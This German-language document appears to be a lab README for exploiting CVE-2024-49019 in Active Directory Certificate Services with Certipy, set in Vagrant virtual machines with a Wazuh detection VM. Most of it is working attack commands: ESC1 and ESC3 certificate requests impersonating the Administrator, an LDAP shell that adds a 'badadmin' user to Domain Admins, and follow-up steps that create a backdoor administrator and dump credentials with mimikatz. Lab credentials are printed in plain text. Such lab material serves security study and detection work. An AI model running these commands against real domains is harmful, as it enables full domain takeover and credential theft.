
Exploitation for CVE-2024-49019
CVE-2024-49019 ist eine Schwachstelle in Active Directory Certificate Services (AD CS), die es einem Angreifer ermöglicht, durch Missbrauch der zertifikatsbasierten Authentifizierung Privilegien zu eskalieren. Dieser Leitfaden zeigt, wie diese Schwachstelle mit Certipy ausgenutzt werden kann.
| Virtuelle Maschine | Benutzername | Passwort |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
Die Ubuntu-Wazuh VM wird zu Erkennungszwecken verwendet. Erkennungsleitfaden Abhilfe
Klonen Sie zunächst das Repository mit den erforderlichen Dateien:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
Sie müssen Vagrant auf Ihrem Host-Computer installieren, bevor Sie fortfahren.
Laden Sie Vagrant von hier herunter und installieren Sie es, oder installieren Sie es mit PowerShell:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
Da der Exploit ein NAT-Netzwerk erfordert, konfigurieren Sie VirtualBox wie folgt:
Stellen Sie vor dem Ausführen des folgenden Befehls sicher, dass VBoxManage zu Ihren Umgebungsvariablen hinzugefügt wurde. Falls nicht, führen Sie den Befehl mit dem vollständigen Pfad aus:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Wenn VBoxManage nicht erkannt wird, verwenden Sie:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
Stellen Sie sicher, dass alle VMs in VirtualBox überprüft und dem Netzwerkadapter NatNetwork - NatNet1 zugewiesen sind. Sie können ein NAT-Netzwerk mit einem anderen Namen erstellen, es muss sich jedoch im IP-Bereich 10.0.2.0/24 befinden.
Stellen Sie vor dem Fortfahren sicher, dass alle VMs eingeschaltet sind.
Greifen Sie auf die Kali Linux VM zu, um den Angriff zu starten, und aktualisieren Sie Ihre /etc/hosts-Datei:
sudo nano /etc/hosts
Fügen Sie den folgenden Eintrag hinzu:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
Speichern und schließen Sie die Datei.
Navigieren Sie zum Verzeichnis CVE-49019 und aktivieren Sie die Python-Virtualenv:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
Es gibt zwei Möglichkeiten, diese Schwachstelle auszunutzen: ESC1 und ESC3.
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
Es gibt eine Problemumgehung: Stellen Sie sicher, dass Ihr Host-Computer die gleiche Zeit wie der Windows-Server selbst hat. Führen Sie diesen Befehl aus, um die Kali-Linux VM auf die gleiche Zeit wie den Windows-Server zu aktualisieren.
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
Sobald Zugriff auf Administratorebene erlangt wurde, kann der Angreifer:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
Informationen zu Erkennungs- und Abhilfestrategien finden Sie im Erkennungsleitfaden.
CVE-2024-49019 stellt ein erhebliches Sicherheitsrisiko dar, da es eine unbefugte Privilegieneskalation ermöglicht. Das Verständnis dieser Schwachstelle und die Implementierung geeigneter Erkennungsmechanismen, beispielsweise mit Wazuh, sind entscheidend für die Sicherung von Active Directory-Umgebungen.
Weitere Informationen zur Sicherung von AD CS finden Sie unter Microsoft Security CVE-2024-49019.